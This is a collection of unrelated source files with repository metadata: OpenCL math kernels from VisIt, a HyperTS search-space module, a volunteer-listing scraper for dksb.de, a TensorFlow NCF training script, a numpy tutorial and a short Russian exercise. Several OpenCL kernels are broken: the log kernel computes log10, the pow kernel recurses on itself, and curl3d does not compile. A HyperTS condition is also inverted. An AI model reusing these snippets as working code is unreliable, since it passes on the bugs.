src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt # Project developers. See the top-level LICENSE file for dates and other # details. No copyright assignment is required to contribute to VisIt. """ file: pyocl_kernels.py author: Cyrus Harrison <[email protected]> created: 9/6/2012 description: """ # Guarded import of pyopencl found_pyopencl = False try: import numpy as npy import pyopencl as cl found_pyopencl = True except ImportError: pass Kernels = { ### add "kadd" : {"name": "add", "input_ports": ["in_a","in_b"], "src":""" float kadd(const float a,const float b) {return a + b;} """}, ### sub "ksub" : {"name": "sub", "input_ports": ["in_a","in_b"], "src":""" float ksub(const float a,const float b) {return a - b;} """}, ### mult "kmult": {"name": "mult", "input_ports": ["in_a","in_b"], "src":""" float kmult(const float a,const float b) {return a * b;} """}, ### div "kdiv": {"name": "div", "input_ports": ["in_a","in_b"], "src":""" float kdiv(const float a,const float b) {return a / b;} """}, ### mod "kmod": {"name": "mod", "input_ports": ["in_a","in_b"], "src":""" float kmod(const float a, const float b) {return a % b;} """}, ### cos "kcos" : {"name": "cos", "input_ports": ["in"], "src":""" float kcos(const float a) {return cos(a);} """}, ### sin "ksin": {"name": "sin", "input_ports": ["in"], "src":""" float ksin(const float a) {return sin(a);} """}, ### sin "ktan": {"name": "tan", "input_ports": ["in"], "src": """ float ktan(const float a) {return tan(a);} """}, ### ciel "kciel": {"name": "ciel", "input_ports": ["in"], "src": """ float kceil(const float a) {return ceil(a);} """}, ### floor "kfloor": {"name": "floor", "input_ports": ["in"], "src":""" float kfloor(const float a) {return floor(a);} """}, ### abs "kabs": {"name": "abs", "input_ports": ["in"], "src":""" float kabs(const float a) {return abs(a);} """}, ### log10 "klog10": {"name": "log10", "input_ports": ["in"], "src":""" float klog10(const float a) {return log10(a);} """}, ### log "klog": {"name": "log", "input_ports": ["in"], "src":""" float klog10(const float a) {return log10(a);} """}, ### exp "kexp": {"name": "exp", "input_ports": ["in"], "src":""" float kexp(const float a) {return exp(a);} """}, ### pow "kpow": {"name": "pow", "input_ports": ["in"], "src":""" float kpow(const float a, const float b) {return kpow(a, b);} """}, ### id "kid": {"name": "id", "input_ports": ["in"], "src":""" float kid(const float a) {return a;} """}, ### square "ksquare": {"name": "square", "input_ports": ["in"], "src": """ float ksquare(const float a) {return a*a;} """}, ### sqrt "ksqrt": {"name": "sqrt", "input_ports": ["in"], "src":""" float ksqrt(const float a) {return sqrt(a);} """}, ### curl3d "curl3d": {"name": "sqrt", "input_ports": ["dfx","dfy","dfx"], "in_types": ["direct", "direct", "direct"], "out_type": "float4", "src":""" float4 kcurl3d(__global const float *dfx, __global const float *dfy, __global const float *dfz { int gid = get_global_id(0); float dfzdy = dfz[gid*3+1]; float dfydz = dfy[gid*3+2]; float dfxdz = dfx[gid*3+2]; float dfzdx = dfz[gid*3]; float dfydx = dfy[gid*3]; float dfxdy = dfx[gid*3+1]; float4 res; res.x = dfzdy - dfydz; res.y = dfxdz - dfzdx; res.z = dfydx - dfxdy; } """}, ### grad3d "kgrad3d": {"name": "grad3d", "input_ports": ["in","dims","x","y","z"], "in_types": ["direct", "direct", "direct", "direct", "direct"], "out_type": "float4", "src":""" float4 kgrad3d(__global const float *v, __global const int *d, __global const float *x, __global const float *y, __global const float *z) { int gid = get_global_id(0); int di = d[0]-1; int dj = d[1]-1; int dk = d[2]-1; int zi = gid % di; int zj = (gid / di) % dj; int zk = (gid / di) / dj; // for rectilinear, we only need 2 points to get dx,dy,dz int pi0 = zi + zj*(di+1) + zk*(di+1)*(dj+1); int pi1 = zi + 1 + (zj+1)*(di+1) + (zk+1)*(di+1)*(dj+1); float vv = v[gid]; float4 p_0 = (float4)(x[pi0],y[pi0],z[pi0],1.0); float4 p_1 = (float4)(x[pi1],y[pi1],z[pi1],1.0); float4 dg = p_1 - p_0; // value float4 f_0 = (float4)(vv,vv,vv,1.0); float4 f_1 = (float4)(vv,vv,vv,1.0); // i bounds if(zi > 0) { f_0.x = v[gid-1]; } if(zi < (di-1)) { f_1.x = v[gid+1]; } // j bounds if(zj > 0) { f_0.y = v[gid-di]; } if(zj < (dj-1)) { f_1.y = v[gid+di]; } // k bounds if(zk > 0) { f_0.z = v[gid-(di*dj)]; } if(zk < (dk-1)) { f_1.z = v[gid+(di*dj)]; } float4 df = (f_1 - f_0) / dg; // central diff if we aren't on the edges if( (zi != 0) && (zi != (di-1))) { df.x *= .5; } // central diff if we aren't on the edges if( (zj != 0) && (zj != (dj-1))) { df.y *= .5; } // central diff if we aren't on the edges if( (zk != 0) && (zk != (dk-1))) { df.z *= .5; } //return (float4)(1.0,2.0,3.0,0.0); return df; } """} } # fill in set defaults for k,v in list(Kernels.items()): if "out_type" not in v: v["out_type"] = "float" if "in_types" not in v: v["in_types"] = [ "fetch" for ipt in v["input_ports"]] def create_stub(filter,inputs): # gen stub glue & execute ident = " " args_ident = " " res = filter.kernel_source res += "\n%s__kernel void kmain(" % ident ninputs = len(inputs) for idx in range(ninputs): if isinstance(inputs[idx],float): itype = "float" elif inputs[idx].dtype == npy.int32: itype = "int " else: itype = "float" iname = "in_%04d" % idx res += "__global const %s *%s,\n%s " % (itype,iname,args_ident) res += "__global float *out)\n" res += "%s{\n" % ident res += "%s int gid = get_global_id(0);\n" % ident call_names = [] for idx in range(ninputs): iname = "in_%04d" % idx if filter.in_types[idx] == "fetch": if isinstance(inputs[idx],float): itype = "float" elif inputs[idx].dtype == npy.int32: itype = "int " else: itype = "float" cname = "%s_fetch" % iname res += "%s %s %s = %s[gid];\n" % (ident,itype,cname,iname) else: cname = iname call_names.append(cname) call = "k%s(" % filter.filter_type for cn in call_names: call += "%s," % cn call = call[:-1] + ")" out_dim = None if filter.out_type == "float": res += "%s out[gid] = %s;\n" % (ident,call) elif filter.out_type == "float4": res += "%s float4 res = %s;\n" % (ident,call) res += "%s out[gid*3] = res.x;\n" % (ident) res += "%s out[gid*3+1] = res.y;\n" % (ident) res += "%s out[gid*3+2] = res.z;\n" % (ident) out_dim = 3 res += "%s}\n" % ident return res, out_dim
28.248503
73
0.388977
8801d2b5ef8db337473836b1a6fae64413b8f56f
11,347
py
Python
hyperts/macro_search_space.py
zhangxjohn/HyperTS
c43c8d820d26dd362510997c1c294341279ce1e1
[ "Apache-2.0" ]
null
null
null
hyperts/macro_search_space.py
zhangxjohn/HyperTS
c43c8d820d26dd362510997c1c294341279ce1e1
[ "Apache-2.0" ]
null
null
null
hyperts/macro_search_space.py
zhangxjohn/HyperTS
c43c8d820d26dd362510997c1c294341279ce1e1
[ "Apache-2.0" ]
null
null
null
# -*- coding:utf-8 -*- """ """ import numpy as np from hyperts.macro_estimators import ProphetForecastEstimator, \ VARForecastEstimator, TSFClassificationEstimator from hyperts.transformers import TimeSeriesHyperTransformer from hyperts.utils import consts from hypernets.tabular import column_selector as tcs from hypernets.core.ops import HyperInput, ModuleChoice, Optional from hypernets.core.search_space import HyperSpace, Choice from hypernets.pipeline.transformers import SimpleImputer, StandardScaler, \ MinMaxScaler, MaxAbsScaler, SafeOrdinalEncoder, AsTypeTransformer from hypernets.pipeline.base import Pipeline, DataFrameMapper from hypernets.utils import logging, get_params logger = logging.get_logger(__name__) ##################################### Define Data Proprecessing Pipeline ##################################### class WithinColumnSelector: def __init__(self, selector, selected_cols): self.selector = selector self.selected_cols = selected_cols def __call__(self, df): intersection = set(df.columns.tolist()).intersection(self.selected_cols) if len(intersection) > 0: selected_df = df[intersection] return self.selector(selected_df) else: return [] def categorical_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0): if impute_strategy is None: impute_strategy = Choice(['constant', 'most_frequent']) elif isinstance(impute_strategy, list): impute_strategy = Choice(impute_strategy) steps = [ AsTypeTransformer(dtype='str', name=f'categorical_as_object_{seq_no}'), SimpleImputer(missing_values=np.nan, strategy=impute_strategy, name=f'categorical_imputer_{seq_no}'), SafeOrdinalEncoder(name=f'categorical_label_encoder_{seq_no}', dtype='int32') ] if covariables is not None: cs = WithinColumnSelector(tcs.column_object_category_bool, covariables) else: cs = tcs.column_object_category_bool pipeline = Pipeline(steps, columns=cs, name=f'categorical_covariable_transform_pipeline_{seq_no}') return pipeline def numeric_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0): if impute_strategy is None: impute_strategy = Choice(['mean', 'median', 'constant', 'most_frequent']) elif isinstance(impute_strategy, list): impute_strategy = Choice(impute_strategy) imputer = SimpleImputer(missing_values=np.nan, strategy=impute_strategy, name=f'numeric_imputer_{seq_no}', force_output_as_float=True) scaler_options = ModuleChoice( [ StandardScaler(name=f'numeric_standard_scaler_{seq_no}'), MinMaxScaler(name=f'numeric_minmax_scaler_{seq_no}'), MaxAbsScaler(name=f'numeric_maxabs_scaler_{seq_no}') ], name=f'numeric_or_scaler_{seq_no}' ) scaler_optional = Optional(scaler_options, keep_link=True, name=f'numeric_scaler_optional_{seq_no}') if covariables == None: cs = WithinColumnSelector(tcs.column_number_exclude_timedelta, covariables) else: cs = tcs.column_number_exclude_timedelta pipeline = Pipeline([imputer, scaler_optional], columns=cs, name=f'numeric_covariate_transform_pipeline_{seq_no}') return pipeline ##################################### Define Base Search Space Generator ##################################### class _HyperEstimatorCreator: def __init__(self, cls, init_kwargs, fit_kwargs): super(_HyperEstimatorCreator, self).__init__() self.estimator_cls = cls self.estimator_fit_kwargs = fit_kwargs if fit_kwargs is not None else {} self.estimator_init_kwargs = init_kwargs if init_kwargs is not None else {} def __call__(self, *args, **kwargs): return self.estimator_cls(self.estimator_fit_kwargs, **self.estimator_init_kwargs) class BaseSearchSpaceGenerator: def __init__(self, **kwargs) -> None: super().__init__() self.options = kwargs @property def estimators(self): raise NotImplementedError def create_preprocessor(self, hyper_input, options): dataframe_mapper_default = options.pop('dataframe_mapper_default', False) covariables = options.pop('covariables', None) timestamp = options.pop('timestamp', None) pipelines = [] if covariables is not None: # category pipelines.append(categorical_transform_pipeline(covariables=covariables)(hyper_input)) # numeric pipelines.append(numeric_transform_pipeline(covariables=covariables)(hyper_input)) # timestamp if timestamp is not None: pipelines.append(Pipeline([TimeSeriesHyperTransformer()], columns=[timestamp], name=f'timestamp_transform_pipeline_0')(hyper_input)) preprocessor = DataFrameMapper(default=dataframe_mapper_default, input_df=True, df_out=True, df_out_dtype_transforms=[(tcs.column_object, 'int')])(pipelines) return preprocessor def create_estimators(self, hyper_input, options): assert len(self.estimators.keys()) > 0 creators = [_HyperEstimatorCreator(pairs[0], init_kwargs=self._merge_dict(pairs[1], options.pop(f'{k}_init_kwargs', None)), fit_kwargs=self._merge_dict(pairs[2], options.pop(f'{k}_fit_kwargs', None))) for k, pairs in self.estimators.items()] unused = {} for k, v in options.items(): used = False for c in creators: if k in c.estimator_init_kwargs.keys(): c.estimator_init_kwargs[k] = v used = True if k in c.estimator_fit_kwargs.keys(): used = True if not used: unused[k] = v if len(unused) > 0: for c in creators: c.estimator_fit_kwargs.update(unused) estimators = [c() for c in creators] return ModuleChoice(estimators, name='estimator_options')(hyper_input) def __call__(self, *args, **kwargs): options = self._merge_dict(self.options, kwargs) space = HyperSpace() with space.as_default(): hyper_input = HyperInput(name='input1') self.create_estimators(self.create_preprocessor(hyper_input, options), options) space.set_inputs(hyper_input) return space def _merge_dict(self, *args): d = {} for a in args: if isinstance(a, dict): d.update(a) return d def __repr__(self): params = get_params(self) params.update(self.options) repr_ = ', '.join(['%s=%r' % (k, v) for k, v in params.items()]) return f'{type(self).__name__}({repr_})' ##################################### Define Specific Search Space Generator ##################################### class StatsForecastSearchSpace(BaseSearchSpaceGenerator): def __init__(self, task, timestamp=None, enable_prophet=True, enable_var=True, **kwargs): kwargs['timestamp'] = timestamp print("Tip: If other parameters exist, set them directly. For example, covariables=['is_holiday'].") super(StatsForecastSearchSpace, self).__init__(**kwargs) self.task = task self.timestamp = timestamp self.enable_prophet = enable_prophet self.enable_var = enable_var @property def default_prophet_init_kwargs(self): return { 'n_changepoints': Choice([25, 35, 45]), 'interval_width': Choice([0.6, 0.7, 0.8]), 'seasonality_mode': Choice(['additive', 'multiplicative']) } @property def default_prophet_fit_kwargs(self): return { 'timestamp': self.timestamp } @property def default_var_init_kwargs(self): return { 'ic': Choice(['aic', 'fpe', 'hqic', 'bic']), 'trend': Choice(['c', 'ct', 'ctt', 'nc', 'n']), 'y_scale': Choice(['min_max', 'max_abs', 'identity']), 'y_log': Choice(['logx', 'none']) } @property def default_var_fit_kwargs(self): return { 'timestamp': self.timestamp } @property def estimators(self): univar_containers = {} multivar_containers = {} if self.enable_prophet: univar_containers['prophet'] = ( ProphetForecastEstimator, self.default_prophet_init_kwargs, self.default_prophet_fit_kwargs) if self.enable_var: multivar_containers['var'] = ( VARForecastEstimator, self.default_var_init_kwargs, self.default_var_fit_kwargs) if self.task == consts.TASK_UNIVARIABLE_FORECAST: return univar_containers elif self.task == consts.TASK_MULTIVARIABLE_FORECAST: return multivar_containers else: raise ValueError(f'Incorrect task name, default {consts.TASK_UNIVARIABLE_FORECAST}' f' or {consts.TASK_MULTIVARIABLE_FORECAST}.') class StatsClassificationSearchSpace(BaseSearchSpaceGenerator): def __init__(self, task, timestamp=None, enable_tsf=True, **kwargs): if hasattr(kwargs, 'covariables'): kwargs.pop('covariables', None) print("Tip: If other parameters exist, set them directly. For example, n_estimators=200.") super(StatsClassificationSearchSpace, self).__init__(**kwargs) self.task = task self.timestamp = timestamp self.enable_tsf = enable_tsf @property def default_tsf_init_kwargs(self): # Time Series Forest return { 'min_interval': Choice([1, 3, 5, 7]), 'n_estimators': Choice([50, 100, 200, 300]), } @property def default_tsf_fit_kwargs(self): return { 'timestamp': self.timestamp } @property def estimators(self): containers = {} if self.enable_tsf: containers['tsf'] = (TSFClassificationEstimator, self.default_tsf_init_kwargs, self.default_tsf_fit_kwargs) return containers stats_forecast_search_space = StatsForecastSearchSpace stats_classification_search_space = StatsClassificationSearchSpace stats_regression_search_space = None dl_univariate_forecast_search_space = None dl_multivariate_forecast_search_space = None dl_univariate_classification_search_space = None dl_multivariate_classification_search_space = None if __name__ == '__main__': from hypernets.searchers.random_searcher import RandomSearcher sfss = stats_forecast_search_space(task='univariable-forecast', timestamp='ts', covariables=['id', 'cos']) searcher = RandomSearcher(sfss, optimize_direction='min') sample = searcher.sample() print(sample)
36.252396
119
0.628448
98f3c32a23563392b8045420c233953252ae871a
4,516
py
Python
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
Betadinho/einander-helfen
272f11397d80ab5267f39a7b36734495f1c00b0c
[ "MIT" ]
7
2020-04-23T20:16:11.000Z
2022-01-04T14:57:16.000Z
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
Betadinho/einander-helfen
272f11397d80ab5267f39a7b36734495f1c00b0c
[ "MIT" ]
361
2020-04-23T17:20:14.000Z
2022-03-02T11:29:45.000Z
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
Betadinho/einander-helfen
272f11397d80ab5267f39a7b36734495f1c00b0c
[ "MIT" ]
1
2021-11-29T06:02:52.000Z
2021-11-29T06:02:52.000Z
import re from data_extraction.scraper import Scraper class DKSBScraper(Scraper): """Scrapes the website dksb.de.""" base_url = 'https://www.dksb.de' debug = True def parse(self, response, url): """Handles the soupified response of a detail page in the predefined way and returns it""" self.logger.debug('parse()') content = response.find('div', {'class': 'remodal-content'}) title_h2 = content.find('h2', {'class': 'subHeadline'}) title = 'Deutscher Kinderschutzbund ' + title_h2.text next_elem = title_h2.next_sibling loc = [] zipcode = None contact = '' is_loc_part = True while next_elem is not None: if is_loc_part and re.match(r'<b>', str(next_elem)): is_loc_part = False if is_loc_part and not re.match(r'<.*?>', str(next_elem)): elem = str(next_elem).strip() if len(elem) > 0: loc.append(elem) if re.match(r'\d{5} ', elem): zipcode = elem.split(' ')[0] if not is_loc_part: contact += str(next_elem) next_elem = next_elem.next_sibling parsed_object = { 'title': title, 'categories': ['Kinder', 'Jugend'], 'location': ', '.join(loc), 'task': """Der Deutsche Kinderschutzbund (DKSB) bietet Ihnen in seinen Orts- und Landesverbänden eine Vielzahl von Möglichkeiten, sich freiwillig zu engagieren.<br> Wenn Ihre Stärken in der Arbeit mit Kindern oder Familien liegen, können Sie z.B. in der Hausaufgabenhilfe oder in Hilfsangeboten für Familien mitarbeiten. Möchten Sie sich in der Büroorganisation oder im Finanzbereich engagieren, sind Sie in der Vorstandsarbeit herzlich willkommen. Auch bei der fachpolitischen Lobbyarbeit für Kinder und Familien ist Ihr Engagement wichtig. Setzen Sie sich in Ihrer Gemeinde für den Kinderschutz ein.<br> Wenn Sie ehrenamtlich beim DKSB mitarbeiten, lernen Sie gleichgesinnte Menschen kennen und können sich in der Arbeit mit Kindern und Familien weiterqualifizieren. Zudem bestimmen Sie die Verbandsarbeit aktiv mit.""", 'target_group': None, 'prerequisites': None, 'language_skills': None, 'timing': None, 'effort': None, 'opportunities': None, 'organization': None, 'contact': contact, 'link': url or None, 'source': 'www.dksb.de', 'geo_location': None, } parsed_object['post_struct'] = { 'title': parsed_object['title'], 'categories': parsed_object['categories'], 'location': { 'country': 'Deutschland', 'zipcode': zipcode, 'city': None, 'street': None, }, 'task': None, 'target_group': None, 'prerequisites': None, 'language_skills': None, 'timing': None, 'effort': None, 'opportunities': None, 'organization': None, 'contact': None, 'link': parsed_object['link'], 'source': parsed_object['source'], 'geo_location': parsed_object['geo_location'], } return parsed_object def add_urls(self): """Adds all URLs of detail pages, found on the search pages, for the crawl function to scrape""" self.logger.debug('add_urls()') search_page_url = f'{self.base_url}/de/dksb-vor-ort/' response = self.soupify(search_page_url) detail_list_entries = response.find_all('div', {'class': 'list-dksbvorort-item'}) self.logger.debug(f'Fetched {len(detail_list_entries)} URLs from {search_page_url} [1/1]') self.update_fetching_progress(1, 1) # Iterate links and add, if not already found for list_entry in detail_list_entries: current_link = self.base_url + '/template/php/dksbvorort/details.php?key=' + list_entry['name'] if current_link in self.urls: self.logger.debug(f'func: add_urls, page_index: 1,' f' search_page: {search_page_url}, ' f'duplicate_index: {current_link}, ' f'duplicate_index: {self.urls.index(current_link)}') else: self.urls.append(current_link)
41.814815
440
0.580602
1be4de6cb8b2d5185f3dc017be273257ae0589df
6,858
py
Python
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
PasaLab/YAO
2e70203197cd79f9522d65731ee5dc0eb236b005
[ "Apache-2.0" ]
2
2021-08-30T14:12:09.000Z
2022-01-20T02:14:22.000Z
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
PasaLab/YAO
2e70203197cd79f9522d65731ee5dc0eb236b005
[ "Apache-2.0" ]
null
null
null
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
PasaLab/YAO
2e70203197cd79f9522d65731ee5dc0eb236b005
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """NCF framework to train and evaluate the NeuMF model. The NeuMF model assembles both MF and MLP models under the NCF framework. Check `neumf_model.py` for more details about the models. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import heapq import json import math import multiprocessing import os import signal import typing # pylint: disable=g-bad-import-order import numpy as np from absl import app as absl_app from absl import flags from absl import logging import tensorflow as tf # pylint: enable=g-bad-import-order from official.recommendation import constants as rconst from official.recommendation import data_pipeline from official.recommendation import data_preprocessing from official.recommendation import movielens from official.recommendation import ncf_common from official.recommendation import neumf_model from official.utils.flags import core as flags_core from official.utils.logs import hooks_helper from official.utils.logs import logger from official.utils.logs import mlperf_helper from official.utils.misc import distribution_utils from official.utils.misc import model_helpers FLAGS = flags.FLAGS def construct_estimator(model_dir, params): """Construct either an Estimator for NCF. Args: model_dir: The model directory for the estimator params: The params dict for the estimator Returns: An Estimator. """ distribution = ncf_common.get_v1_distribution_strategy(params) run_config = tf.estimator.RunConfig(train_distribute=distribution, eval_distribute=distribution) model_fn = neumf_model.neumf_model_fn estimator = tf.estimator.Estimator(model_fn=model_fn, model_dir=model_dir, config=run_config, params=params) return estimator def log_and_get_hooks(eval_batch_size): """Convenience function for hook and logger creation.""" # Create hooks that log information about the training and metric values train_hooks = hooks_helper.get_train_hooks( FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size, # for ExamplesPerSecondHook tensors_to_log={"cross_entropy": "cross_entropy"} ) run_params = { "batch_size": FLAGS.batch_size, "eval_batch_size": eval_batch_size, "number_factors": FLAGS.num_factors, "hr_threshold": FLAGS.hr_threshold, "train_epochs": FLAGS.train_epochs, } benchmark_logger = logger.get_benchmark_logger() benchmark_logger.log_run_info( model_name="recommendation", dataset_name=FLAGS.dataset, run_params=run_params, test_id=FLAGS.benchmark_test_id) return benchmark_logger, train_hooks def main(_): with logger.benchmark_context(FLAGS), \ mlperf_helper.LOGGER(FLAGS.output_ml_perf_compliance_logging): mlperf_helper.set_ncf_root(os.path.split(os.path.abspath(__file__))[0]) run_ncf(FLAGS) def run_ncf(_): """Run NCF training and eval loop.""" params = ncf_common.parse_flags(FLAGS) num_users, num_items, num_train_steps, num_eval_steps, producer = ( ncf_common.get_inputs(params)) params["num_users"], params["num_items"] = num_users, num_items producer.start() model_helpers.apply_clean(flags.FLAGS) estimator = construct_estimator(model_dir=FLAGS.model_dir, params=params) benchmark_logger, train_hooks = log_and_get_hooks(params["eval_batch_size"]) total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals target_reached = False mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_LOOP) for cycle_index in range(total_training_cycle): assert FLAGS.epochs_between_evals == 1 or not mlperf_helper.LOGGER.enabled logging.info("Starting a training cycle: {}/{}".format( cycle_index + 1, total_training_cycle)) mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_EPOCH, value=cycle_index) train_input_fn = producer.make_input_fn(is_training=True) estimator.train(input_fn=train_input_fn, hooks=train_hooks, steps=num_train_steps) logging.info("Beginning evaluation.") eval_input_fn = producer.make_input_fn(is_training=False) mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_START, value=cycle_index) eval_results = estimator.evaluate(eval_input_fn, steps=num_eval_steps) logging.info("Evaluation complete.") hr = float(eval_results[rconst.HR_KEY]) ndcg = float(eval_results[rconst.NDCG_KEY]) loss = float(eval_results["loss"]) mlperf_helper.ncf_print( key=mlperf_helper.TAGS.EVAL_TARGET, value={"epoch": cycle_index, "value": FLAGS.hr_threshold}) mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_ACCURACY, value={"epoch": cycle_index, "value": hr}) mlperf_helper.ncf_print( key=mlperf_helper.TAGS.EVAL_HP_NUM_NEG, value={"epoch": cycle_index, "value": rconst.NUM_EVAL_NEGATIVES}) mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_STOP, value=cycle_index) # Benchmark the evaluation results benchmark_logger.log_evaluation_result(eval_results) # Log the HR and NDCG results. logging.info( "Iteration {}: HR = {:.4f}, NDCG = {:.4f}, Loss = {:.4f}".format( cycle_index + 1, hr, ndcg, loss)) # If some evaluation threshold is met if model_helpers.past_stop_threshold(FLAGS.hr_threshold, hr): target_reached = True break mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_STOP, value={"success": target_reached}) producer.stop_loop() producer.join() # Clear the session explicitly to avoid session delete error tf.keras.backend.clear_session() mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_FINAL) if __name__ == "__main__": logging.set_verbosity(logging.INFO) ncf_common.define_ncf_flags() absl_app.run(main)
36.094737
81
0.715223
409ee4439c5e2beef5d84d0609d9d97498d8be26
3,831
py
Python
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CS231n Convolutional Neural Networks for Visual Recognition http://cs231n.github.io/ Python Numpy Tutorial http://cs231n.github.io/python-numpy-tutorial/ Numpy Reference https://docs.scipy.org/doc/numpy/reference/  ̄ python_numpy_tutorial-numpy_array_indexing.py 2019-07-02 (Tue) """ # Python Numpy Tutorial > Numpy > Array indexing # Numpy offers several ways to index into arrays. # # This examples cover: # Slicing # Integer array indexing # Boolean array indexing ############# # Slicing # ############# # Similar to Python lists, numpy arrays can be sliced. # Since arrays may be multidimensional, # you must specify a slice for each dimension of the array. import numpy as np # Create a new array a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]]) print(a) #[[ 1 2 3 4] # [ 5 6 7 8] # [ 9 10 11 12]] b = a[:2,1:3] print(b) #[[2 3] # [6 7]] print( a[0,1] ) #2 b[0,0] = 77 print( a[0,1] ) #77 print(a) #[[ 1 77 3 4] # [ 5 6 7 8] # [ 9 10 11 12]] print(b) #[[77 3] # [ 6 7]] # You can also mix integer indexing with slice indexing. # However, doing so will yield an array of lower rank than the original array. # Note this is different from the way MATLAB handles array slicing. # Create a new array # NOTE a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]]) # NOTE print(a) # NOTE #[[ 1 2 3 4] # NOTE # [ 5 6 7 8] # NOTE # [ 9 10 11 12]] # NOTE row_r1 = a[1,:] print( row_r1, row_r1.shape ) #[5 6 7 8] (4,) row_r2 = a[1:2,:] # NOTE print( row_r2,row_r2.shape ) # NOTE: Review this again #[[5 6 7 8]] (1, 4) # NOTE col_r1 = a[:,1] # NOTE print( col_r1,col_r1.shape ) # NOTE # [ 2 6 10] (3,) # NOTE col_r2 = a[:,1:2] # NOTE print( col_r2,col_r2.shape ) # NOTE: Review this again #[[ 2] # NOTE # [ 6] # NOTE # [10]] (3, 1) # NOTE ############################ # Integer array indexing # ############################ # When you index into numpy arrays using slicing, # the resulting array view will always be a subarray of the original array. # In contrast, integer array indexing allows you to construct arbitrary arrays using the data from another array. a = np.array( [[1,2],[3,4],[5,6]]) print(a) #[[1 2] # [3 4] # [5 6]] # An example of integer array indexing print( a[[0,1,2],[0,1,0]] ) # [1 4 5] # Identical to [a[0,0], a[1,1], a[2,0]] print( np.array( [ a[0,0], a[1,1], a[2,0] ]) ) # [1 4 5] # The same element from the source array can be used. # in this case a[0,1] is repeated. print( a[[0,0],[1,1]] ) # [2,2] print( np.array( [a[0,1],a[0,1]]) ) # [2,2] # One useful trick with integer array indexing is # selecting or mutating one element from each row of a matrix: # Create a new array a = np.array( [[1,2,3], [4,5,6], [7,8,9], [10,11,12]]) print(a) #[[ 1 2 3] # [ 4 5 6] # [ 7 8 9] # [10 11 12]] # Create an array of indices b = np.array( [0,2,0,1] ) print( a[ np.arange(4), b] ) # [ 1 6 7 11] # [np.arange(4), b] means # [ [0,1,2,3],[0,2,0,1] ] # => a[0,0], a[1,2], a[2,0], a[3,1] # Mutate one element from each row of a using the indices in b a[np.arange(4),b] += 10 print(a) #[[11 2 3] # [ 4 5 16] # [17 8 9] # [10 21 12]] # Add 10 to the indices ############################ # Boolean array indexing # ############################ # Boolean array indexing lets you pick out arbitrary elements of an array. # Frequently this type of indexing is used to select the elements of an array # that satisfy some condition. a = np.array( [[1,2],[3,4],[5,6]] ) print(a) #[[1 2] # [3 4] # [5 6]] bool_idx = (a > 2) print( bool_idx ) #[[False False] # [ True True] # [ True True]] print( a[bool_idx] ) #[3 4 5 6] print( a[ a>2] ) #[3 4 5 6] print( a[ a>4] ) #[5 6]
22.273256
114
0.567476
31cb02371faa1d6684f8d85cec4fbda3959ffd47
483
py
Python
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 2. Вариант 50 # Напишите программу, которая будет выводить на экран наиболее понравившееся # вам высказывание, автором которого является Иларион (Алфеев) . # Не забудьте о том, что автор должен быть упомянут на отдельной строке. # Bronnikov I.S. # 24.05.2016 print("«Нельзя «лезть в душу» человека, ибо душа – это святое святых, и туда можно войти только если вам отворят и пригласят внутрь."" "\nИларион (Алфеев)") input("\n\nНажмите Enter для выхода.")
40.25
135
0.728778
